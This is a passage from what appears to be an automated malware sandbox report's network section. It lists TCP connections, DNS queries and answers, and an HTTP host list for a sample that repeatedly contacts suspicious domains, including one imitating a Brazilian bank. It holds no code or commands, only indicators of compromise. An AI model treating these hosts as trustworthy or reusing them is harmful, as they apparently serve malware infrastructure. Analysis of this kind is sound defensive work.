                              Aug 30, 2024 09:18:57.198255062 CEST80497385.144.130.52192.168.2.5
                              Aug 30, 2024 09:18:57.198421001 CEST4973880192.168.2.55.144.130.52
                              Aug 30, 2024 09:18:57.206478119 CEST4973880192.168.2.55.144.130.52
                              Aug 30, 2024 09:18:57.211302042 CEST80497385.144.130.52192.168.2.5
                              Aug 30, 2024 09:18:59.098594904 CEST80497355.144.130.52192.168.2.5
                              Aug 30, 2024 09:18:59.098683119 CEST4973580192.168.2.55.144.130.52
                              Aug 30, 2024 09:19:04.191282988 CEST80497375.144.130.52192.168.2.5
                              Aug 30, 2024 09:19:04.191488981 CEST4973780192.168.2.55.144.130.52
                              Aug 30, 2024 09:19:06.984229088 CEST80497385.144.130.52192.168.2.5
                              Aug 30, 2024 09:19:06.984359026 CEST80497385.144.130.52192.168.2.5
                              Aug 30, 2024 09:19:06.984522104 CEST4973880192.168.2.55.144.130.52
                              Aug 30, 2024 09:19:06.987739086 CEST4973880192.168.2.55.144.130.52
                              Aug 30, 2024 09:19:06.993999004 CEST80497385.144.130.52192.168.2.5
                              Aug 30, 2024 09:19:20.135782957 CEST4973980192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:20.143152952 CEST8049739161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:20.143455982 CEST4973980192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:20.155405045 CEST4973980192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:20.160582066 CEST8049739161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:20.766699076 CEST8049739161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:20.766726017 CEST8049739161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:20.766772985 CEST4973980192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:20.766817093 CEST8049739161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:20.766863108 CEST4973980192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:21.657747030 CEST4973980192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:22.721986055 CEST4974080192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:22.727015972 CEST8049740161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:22.727114916 CEST4974080192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:22.777108908 CEST4974080192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:22.781946898 CEST8049740161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:23.357841969 CEST8049740161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:23.357861996 CEST8049740161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:23.357899904 CEST8049740161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:23.357920885 CEST4974080192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:23.357958078 CEST4974080192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:24.284441948 CEST4974080192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:25.359540939 CEST4974180192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:25.364466906 CEST8049741161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:25.364613056 CEST4974180192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:25.375932932 CEST4974180192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:25.381298065 CEST8049741161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:25.381761074 CEST8049741161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:25.970232964 CEST8049741161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:25.970263004 CEST8049741161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:25.970334053 CEST8049741161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:25.970333099 CEST4974180192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:25.970478058 CEST4974180192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:26.892160892 CEST4974180192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:28.106467962 CEST4974280192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:28.111428022 CEST8049742161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:28.114319086 CEST4974280192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:28.139924049 CEST4974280192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:28.144820929 CEST8049742161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:28.745414019 CEST8049742161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:28.745436907 CEST8049742161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:28.745450020 CEST8049742161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:28.745470047 CEST8049742161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:28.745575905 CEST4974280192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:28.748836040 CEST4974280192.168.2.5161.97.168.245
                              Aug 30, 2024 09:19:28.753746033 CEST8049742161.97.168.245192.168.2.5
                              Aug 30, 2024 09:19:33.776453972 CEST4974380192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:33.781933069 CEST80497433.33.130.190192.168.2.5
                              Aug 30, 2024 09:19:33.782069921 CEST4974380192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:33.795469999 CEST4974380192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:33.800286055 CEST80497433.33.130.190192.168.2.5
                              Aug 30, 2024 09:19:34.266516924 CEST80497433.33.130.190192.168.2.5
                              Aug 30, 2024 09:19:34.266715050 CEST4974380192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:35.308444023 CEST4974380192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:35.313339949 CEST80497433.33.130.190192.168.2.5
                              Aug 30, 2024 09:19:36.317020893 CEST4974480192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:36.322743893 CEST80497443.33.130.190192.168.2.5
                              Aug 30, 2024 09:19:36.322885036 CEST4974480192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:36.333549976 CEST4974480192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:36.339493990 CEST80497443.33.130.190192.168.2.5
                              Aug 30, 2024 09:19:36.788455009 CEST80497443.33.130.190192.168.2.5
                              Aug 30, 2024 09:19:36.788522959 CEST4974480192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:37.878906012 CEST4974480192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:37.883850098 CEST80497443.33.130.190192.168.2.5
                              Aug 30, 2024 09:19:38.895504951 CEST4974580192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:38.900396109 CEST80497453.33.130.190192.168.2.5
                              Aug 30, 2024 09:19:38.900506973 CEST4974580192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:38.913570881 CEST4974580192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:38.918513060 CEST80497453.33.130.190192.168.2.5
                              Aug 30, 2024 09:19:38.918524027 CEST80497453.33.130.190192.168.2.5
                              Aug 30, 2024 09:19:39.365252018 CEST80497453.33.130.190192.168.2.5
                              Aug 30, 2024 09:19:39.365441084 CEST4974580192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:40.424465895 CEST4974580192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:40.430890083 CEST80497453.33.130.190192.168.2.5
                              Aug 30, 2024 09:19:41.443542004 CEST4974680192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:41.448494911 CEST80497463.33.130.190192.168.2.5
                              Aug 30, 2024 09:19:41.448601961 CEST4974680192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:41.457484007 CEST4974680192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:41.463277102 CEST80497463.33.130.190192.168.2.5
                              Aug 30, 2024 09:19:42.855679035 CEST80497463.33.130.190192.168.2.5
                              Aug 30, 2024 09:19:42.856091976 CEST80497463.33.130.190192.168.2.5
                              Aug 30, 2024 09:19:42.856153011 CEST4974680192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:42.859720945 CEST4974680192.168.2.53.33.130.190
                              Aug 30, 2024 09:19:42.867503881 CEST80497463.33.130.190192.168.2.5
                              Aug 30, 2024 09:19:49.058145046 CEST4974780192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:49.063034058 CEST8049747218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:49.063138962 CEST4974780192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:49.078818083 CEST4974780192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:49.083731890 CEST8049747218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:50.045754910 CEST8049747218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:50.045790911 CEST8049747218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:50.045800924 CEST8049747218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:50.047574997 CEST4974780192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:50.596487045 CEST4974780192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:51.615261078 CEST4974880192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:51.620419979 CEST8049748218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:51.620539904 CEST4974880192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:51.630683899 CEST4974880192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:51.635471106 CEST8049748218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:52.600596905 CEST8049748218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:52.600615025 CEST8049748218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:52.600629091 CEST8049748218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:52.600682974 CEST4974880192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:53.142225981 CEST4974880192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:54.162602901 CEST4974980192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:54.167515039 CEST8049749218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:54.167627096 CEST4974980192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:54.178549051 CEST4974980192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:54.183379889 CEST8049749218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:54.183581114 CEST8049749218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:55.132332087 CEST8049749218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:55.132349014 CEST8049749218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:55.132364035 CEST8049749218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:55.132399082 CEST4974980192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:55.136478901 CEST4974980192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:55.692493916 CEST4974980192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:56.708961964 CEST4975080192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:56.715549946 CEST8049750218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:56.715658903 CEST4975080192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:56.724605083 CEST4975080192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:56.731925011 CEST8049750218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:57.700685978 CEST8049750218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:57.700709105 CEST8049750218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:57.700722933 CEST8049750218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:57.700795889 CEST8049750218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:57.700808048 CEST8049750218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:57.700824022 CEST8049750218.247.68.184192.168.2.5
                              Aug 30, 2024 09:19:57.701117039 CEST4975080192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:57.705802917 CEST4975080192.168.2.5218.247.68.184
                              Aug 30, 2024 09:19:57.710705042 CEST8049750218.247.68.184192.168.2.5
                              Aug 30, 2024 09:20:02.901423931 CEST4975180192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:02.906866074 CEST804975113.248.169.48192.168.2.5
                              Aug 30, 2024 09:20:02.906940937 CEST4975180192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:02.920675993 CEST4975180192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:02.925992966 CEST804975113.248.169.48192.168.2.5
                              Aug 30, 2024 09:20:03.372298956 CEST804975113.248.169.48192.168.2.5
                              Aug 30, 2024 09:20:03.372374058 CEST4975180192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:04.423624039 CEST4975180192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:04.430119991 CEST804975113.248.169.48192.168.2.5
                              Aug 30, 2024 09:20:05.442924976 CEST4975280192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:05.450820923 CEST804975213.248.169.48192.168.2.5
                              Aug 30, 2024 09:20:05.450999022 CEST4975280192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:05.467116117 CEST4975280192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:05.474173069 CEST804975213.248.169.48192.168.2.5
                              Aug 30, 2024 09:20:05.943479061 CEST804975213.248.169.48192.168.2.5
                              Aug 30, 2024 09:20:05.943803072 CEST4975280192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:06.970350981 CEST4975280192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:06.979103088 CEST804975213.248.169.48192.168.2.5
                              Aug 30, 2024 09:20:07.989269018 CEST4975380192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:07.994218111 CEST804975313.248.169.48192.168.2.5
                              Aug 30, 2024 09:20:07.996640921 CEST4975380192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:08.008528948 CEST4975380192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:08.013515949 CEST804975313.248.169.48192.168.2.5
                              Aug 30, 2024 09:20:08.013534069 CEST804975313.248.169.48192.168.2.5
                              Aug 30, 2024 09:20:08.487885952 CEST804975313.248.169.48192.168.2.5
                              Aug 30, 2024 09:20:08.488774061 CEST4975380192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:09.517163992 CEST4975380192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:09.522067070 CEST804975313.248.169.48192.168.2.5
                              Aug 30, 2024 09:20:10.537338972 CEST4975480192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:10.542332888 CEST804975413.248.169.48192.168.2.5
                              Aug 30, 2024 09:20:10.542428017 CEST4975480192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:10.552155972 CEST4975480192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:10.557069063 CEST804975413.248.169.48192.168.2.5
                              Aug 30, 2024 09:20:11.000072002 CEST804975413.248.169.48192.168.2.5
                              Aug 30, 2024 09:20:11.000127077 CEST804975413.248.169.48192.168.2.5
                              Aug 30, 2024 09:20:11.000233889 CEST4975480192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:11.004453897 CEST4975480192.168.2.513.248.169.48
                              Aug 30, 2024 09:20:11.009776115 CEST804975413.248.169.48192.168.2.5
                              Aug 30, 2024 09:20:24.252746105 CEST4975580192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:24.257563114 CEST804975585.159.66.93192.168.2.5
                              Aug 30, 2024 09:20:24.257661104 CEST4975580192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:24.268382072 CEST4975580192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:24.277770042 CEST804975585.159.66.93192.168.2.5
                              Aug 30, 2024 09:20:24.986267090 CEST804975585.159.66.93192.168.2.5
                              Aug 30, 2024 09:20:24.986351967 CEST804975585.159.66.93192.168.2.5
                              Aug 30, 2024 09:20:24.986401081 CEST4975580192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:25.782776117 CEST4975580192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:26.801645994 CEST4975680192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:26.806596994 CEST804975685.159.66.93192.168.2.5
                              Aug 30, 2024 09:20:26.806674957 CEST4975680192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:26.820211887 CEST4975680192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:26.825094938 CEST804975685.159.66.93192.168.2.5
                              Aug 30, 2024 09:20:27.507806063 CEST804975685.159.66.93192.168.2.5
                              Aug 30, 2024 09:20:27.507888079 CEST804975685.159.66.93192.168.2.5
                              Aug 30, 2024 09:20:27.508042097 CEST4975680192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:28.329699993 CEST4975680192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:29.348643064 CEST4975780192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:29.353584051 CEST804975785.159.66.93192.168.2.5
                              Aug 30, 2024 09:20:29.353725910 CEST4975780192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:29.362643003 CEST4975780192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:29.367607117 CEST804975785.159.66.93192.168.2.5
                              Aug 30, 2024 09:20:29.367724895 CEST804975785.159.66.93192.168.2.5
                              Aug 30, 2024 09:20:30.057262897 CEST804975785.159.66.93192.168.2.5
                              Aug 30, 2024 09:20:30.057391882 CEST804975785.159.66.93192.168.2.5
                              Aug 30, 2024 09:20:30.057598114 CEST4975780192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:30.876498938 CEST4975780192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:31.896565914 CEST4975880192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:31.901458979 CEST804975885.159.66.93192.168.2.5
                              Aug 30, 2024 09:20:31.901665926 CEST4975880192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:31.912564039 CEST4975880192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:31.917474031 CEST804975885.159.66.93192.168.2.5
                              Aug 30, 2024 09:20:32.583193064 CEST804975885.159.66.93192.168.2.5
                              Aug 30, 2024 09:20:32.583214998 CEST804975885.159.66.93192.168.2.5
                              Aug 30, 2024 09:20:32.583353043 CEST4975880192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:32.586755037 CEST4975880192.168.2.585.159.66.93
                              Aug 30, 2024 09:20:32.591650963 CEST804975885.159.66.93192.168.2.5

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 30, 2024 09:17:18.138473988 CEST6132753192.168.2.51.1.1.1
                              Aug 30, 2024 09:17:18.490772009 CEST53613271.1.1.1192.168.2.5
                              Aug 30, 2024 09:17:34.067393064 CEST5798953192.168.2.51.1.1.1
                              Aug 30, 2024 09:17:34.224216938 CEST53579891.1.1.1192.168.2.5
                              Aug 30, 2024 09:17:47.395056963 CEST6177153192.168.2.51.1.1.1
                              Aug 30, 2024 09:17:47.688960075 CEST53617711.1.1.1192.168.2.5
                              Aug 30, 2024 09:18:01.272314072 CEST5291153192.168.2.51.1.1.1
                              Aug 30, 2024 09:18:14.617090940 CEST6003453192.168.2.51.1.1.1
                              Aug 30, 2024 09:18:14.632633924 CEST53600341.1.1.1192.168.2.5
                              Aug 30, 2024 09:18:28.192125082 CEST5628653192.168.2.51.1.1.1
                              Aug 30, 2024 09:18:28.254106045 CEST53562861.1.1.1192.168.2.5
                              Aug 30, 2024 09:18:41.382477045 CEST5545353192.168.2.51.1.1.1
                              Aug 30, 2024 09:18:41.397739887 CEST53554531.1.1.1192.168.2.5
                              Aug 30, 2024 09:18:49.460411072 CEST5416553192.168.2.51.1.1.1
                              Aug 30, 2024 09:18:49.544049025 CEST53541651.1.1.1192.168.2.5
                              Aug 30, 2024 09:19:12.005759954 CEST6375853192.168.2.51.1.1.1
                              Aug 30, 2024 09:19:12.024478912 CEST53637581.1.1.1192.168.2.5
                              Aug 30, 2024 09:19:20.082912922 CEST4942853192.168.2.51.1.1.1
                              Aug 30, 2024 09:19:20.133075953 CEST53494281.1.1.1192.168.2.5
                              Aug 30, 2024 09:19:33.755487919 CEST5780453192.168.2.51.1.1.1
                              Aug 30, 2024 09:19:33.768579006 CEST53578041.1.1.1192.168.2.5
                              Aug 30, 2024 09:19:47.864885092 CEST5203953192.168.2.51.1.1.1
                              Aug 30, 2024 09:19:48.876673937 CEST5203953192.168.2.51.1.1.1
                              Aug 30, 2024 09:19:49.055099010 CEST53520391.1.1.1192.168.2.5
                              Aug 30, 2024 09:19:49.055114031 CEST53520391.1.1.1192.168.2.5
                              Aug 30, 2024 09:20:02.724828005 CEST5243853192.168.2.51.1.1.1
                              Aug 30, 2024 09:20:02.897896051 CEST53524381.1.1.1192.168.2.5
                              Aug 30, 2024 09:20:16.020549059 CEST5601953192.168.2.51.1.1.1
                              Aug 30, 2024 09:20:16.030989885 CEST53560191.1.1.1192.168.2.5
                              Aug 30, 2024 09:20:24.104546070 CEST5412653192.168.2.51.1.1.1
                              Aug 30, 2024 09:20:24.249870062 CEST53541261.1.1.1192.168.2.5

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Aug 30, 2024 09:17:18.138473988 CEST192.168.2.51.1.1.10x6cc2Standard query (0)www.clientebradesco.onlineA (IP address)IN (0x0001)false
                              Aug 30, 2024 09:17:34.067393064 CEST192.168.2.51.1.1.10x4e2cStandard query (0)www.myim.cloudA (IP address)IN (0x0001)false
                              Aug 30, 2024 09:17:47.395056963 CEST192.168.2.51.1.1.10xd2f5Standard query (0)www.d55dg.topA (IP address)IN (0x0001)false
                              Aug 30, 2024 09:18:01.272314072 CEST192.168.2.51.1.1.10xec19Standard query (0)www.arlon-commerce.comA (IP address)IN (0x0001)false
                              Aug 30, 2024 09:18:14.617090940 CEST192.168.2.51.1.1.10xefbcStandard query (0)www.fineg.onlineA (IP address)IN (0x0001)false
                              Aug 30, 2024 09:18:28.192125082 CEST192.168.2.51.1.1.10x7a40Standard query (0)www.asian-massage-us.xyzA (IP address)IN (0x0001)false
                              Aug 30, 2024 09:18:41.382477045 CEST192.168.2.51.1.1.10xcbf5Standard query (0)www.thriveline.onlineA (IP address)IN (0x0001)false
                              Aug 30, 2024 09:18:49.460411072 CEST192.168.2.51.1.1.10x45e3Standard query (0)www.aflaksokna.comA (IP address)IN (0x0001)false
                              Aug 30, 2024 09:19:12.005759954 CEST192.168.2.51.1.1.10x8f51Standard query (0)www.esistiliya.onlineA (IP address)IN (0x0001)false
                              Aug 30, 2024 09:19:20.082912922 CEST192.168.2.51.1.1.10xde92Standard query (0)www.qiluqiyuan.buzzA (IP address)IN (0x0001)false
                              Aug 30, 2024 09:19:33.755487919 CEST192.168.2.51.1.1.10xe3f3Standard query (0)www.omexai.infoA (IP address)IN (0x0001)false
                              Aug 30, 2024 09:19:47.864885092 CEST192.168.2.51.1.1.10xcbc6Standard query (0)www.dfbio.netA (IP address)IN (0x0001)false
                              Aug 30, 2024 09:19:48.876673937 CEST192.168.2.51.1.1.10xcbc6Standard query (0)www.dfbio.netA (IP address)IN (0x0001)false
                              Aug 30, 2024 09:20:02.724828005 CEST192.168.2.51.1.1.10x6c97Standard query (0)www.healthsolutions.topA (IP address)IN (0x0001)false
                              Aug 30, 2024 09:20:16.020549059 CEST192.168.2.51.1.1.10x8c67Standard query (0)www.950021.comA (IP address)IN (0x0001)false
                              Aug 30, 2024 09:20:24.104546070 CEST192.168.2.51.1.1.10xf1cStandard query (0)www.golbasi-nakliyat.xyzA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Aug 30, 2024 09:17:18.490772009 CEST1.1.1.1192.168.2.50x6cc2No error (0)www.clientebradesco.online45.33.23.183A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:17:18.490772009 CEST1.1.1.1192.168.2.50x6cc2No error (0)www.clientebradesco.online45.33.2.79A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:17:18.490772009 CEST1.1.1.1192.168.2.50x6cc2No error (0)www.clientebradesco.online198.58.118.167A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:17:18.490772009 CEST1.1.1.1192.168.2.50x6cc2No error (0)www.clientebradesco.online72.14.178.174A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:17:18.490772009 CEST1.1.1.1192.168.2.50x6cc2No error (0)www.clientebradesco.online45.56.79.23A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:17:18.490772009 CEST1.1.1.1192.168.2.50x6cc2No error (0)www.clientebradesco.online173.255.194.134A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:17:18.490772009 CEST1.1.1.1192.168.2.50x6cc2No error (0)www.clientebradesco.online96.126.123.244A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:17:18.490772009 CEST1.1.1.1192.168.2.50x6cc2No error (0)www.clientebradesco.online45.33.20.235A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:17:18.490772009 CEST1.1.1.1192.168.2.50x6cc2No error (0)www.clientebradesco.online45.33.18.44A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:17:18.490772009 CEST1.1.1.1192.168.2.50x6cc2No error (0)www.clientebradesco.online72.14.185.43A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:17:18.490772009 CEST1.1.1.1192.168.2.50x6cc2No error (0)www.clientebradesco.online45.33.30.197A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:17:18.490772009 CEST1.1.1.1192.168.2.50x6cc2No error (0)www.clientebradesco.online45.79.19.196A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:17:34.224216938 CEST1.1.1.1192.168.2.50x4e2cNo error (0)www.myim.cloud199.59.243.226A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:17:47.688960075 CEST1.1.1.1192.168.2.50xd2f5No error (0)www.d55dg.topd55dg.topCNAME (Canonical name)IN (0x0001)false
                              Aug 30, 2024 09:17:47.688960075 CEST1.1.1.1192.168.2.50xd2f5No error (0)d55dg.top154.23.184.240A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:18:01.329358101 CEST1.1.1.1192.168.2.50xec19No error (0)www.arlon-commerce.comwhois-unverified.domainbox.akadns.netCNAME (Canonical name)IN (0x0001)false
                              Aug 30, 2024 09:18:14.632633924 CEST1.1.1.1192.168.2.50xefbcNo error (0)www.fineg.online162.0.239.141A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:18:28.254106045 CEST1.1.1.1192.168.2.50x7a40No error (0)www.asian-massage-us.xyz199.59.243.226A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:18:41.397739887 CEST1.1.1.1192.168.2.50xcbf5Server failure (2)www.thriveline.onlinenonenoneA (IP address)IN (0x0001)false
                              Aug 30, 2024 09:18:49.544049025 CEST1.1.1.1192.168.2.50x45e3No error (0)www.aflaksokna.comaflaksokna.comCNAME (Canonical name)IN (0x0001)false
                              Aug 30, 2024 09:18:49.544049025 CEST1.1.1.1192.168.2.50x45e3No error (0)aflaksokna.com5.144.130.52A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:19:12.024478912 CEST1.1.1.1192.168.2.50x8f51Name error (3)www.esistiliya.onlinenonenoneA (IP address)IN (0x0001)false
                              Aug 30, 2024 09:19:20.133075953 CEST1.1.1.1192.168.2.50xde92No error (0)www.qiluqiyuan.buzz161.97.168.245A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:19:33.768579006 CEST1.1.1.1192.168.2.50xe3f3No error (0)www.omexai.infoomexai.infoCNAME (Canonical name)IN (0x0001)false
                              Aug 30, 2024 09:19:33.768579006 CEST1.1.1.1192.168.2.50xe3f3No error (0)omexai.info3.33.130.190A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:19:33.768579006 CEST1.1.1.1192.168.2.50xe3f3No error (0)omexai.info15.197.148.33A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:19:49.055099010 CEST1.1.1.1192.168.2.50xcbc6No error (0)www.dfbio.net218.247.68.184A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:19:49.055114031 CEST1.1.1.1192.168.2.50xcbc6No error (0)www.dfbio.net218.247.68.184A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:20:02.897896051 CEST1.1.1.1192.168.2.50x6c97No error (0)www.healthsolutions.top13.248.169.48A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:20:02.897896051 CEST1.1.1.1192.168.2.50x6c97No error (0)www.healthsolutions.top76.223.54.146A (IP address)IN (0x0001)false
                              Aug 30, 2024 09:20:16.030989885 CEST1.1.1.1192.168.2.50x8c67Name error (3)www.950021.comnonenoneA (IP address)IN (0x0001)false
                              Aug 30, 2024 09:20:24.249870062 CEST1.1.1.1192.168.2.50xf1cNo error (0)www.golbasi-nakliyat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                              Aug 30, 2024 09:20:24.249870062 CEST1.1.1.1192.168.2.50xf1cNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                              Aug 30, 2024 09:20:24.249870062 CEST1.1.1.1192.168.2.50xf1cNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • www.clientebradesco.online
                              • www.myim.cloud
                              • www.d55dg.top
                              • www.fineg.online
                              • www.asian-massage-us.xyz
                              • www.aflaksokna.com
                              • www.qiluqiyuan.buzz
                              • www.omexai.info
                              • www.dfbio.net
                              • www.healthsolutions.top
                              • www.golbasi-nakliyat.xyz

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
